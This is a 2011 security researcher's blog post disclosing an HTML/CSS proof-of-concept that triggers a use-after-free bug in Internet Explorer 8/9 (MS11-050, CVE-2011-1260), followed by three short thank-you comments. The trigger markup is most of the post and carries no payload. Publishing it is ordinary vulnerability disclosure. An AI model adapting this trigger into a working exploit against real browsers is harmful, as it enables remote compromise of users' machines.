viernes, 17 de junio de 2011

:::SPAS3C-SV-005:::IE8/9 USE-AFTER-FREE VULNERABILITY POC (ZDI-11-194/MS11-050/CVE-2011-1260)

Just the poc for my (and not only my finding) last IE (use-after-free) vulnerability:


<STYLE>
object{
float: left;
}
</STYLE>
<acronym>
hggssssssssssssssssssssssssddddddddddddddddddddddddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadddddddddddddddddddddddddddddddddddddddddddddddddddddddd
</acronym>
<object>
head
</object>
<col>
ccc
</col>
<div style = 'layout-grid-char: 35735636357357354ex;'>
aaaaaa
</div>

You will find an awesome work, exploit, even new targets (IE6/IE7) in d0c_s4vage's blog.

More references:

3 comentarios:

d0c.s4vage dijo...

Nice work! At least somebody got some use out of it :^)

José A. Vázquez dijo...

hehe Thanks ;)

José A. Vázquez dijo...

@d0c.s4vage...and thanks very much for your update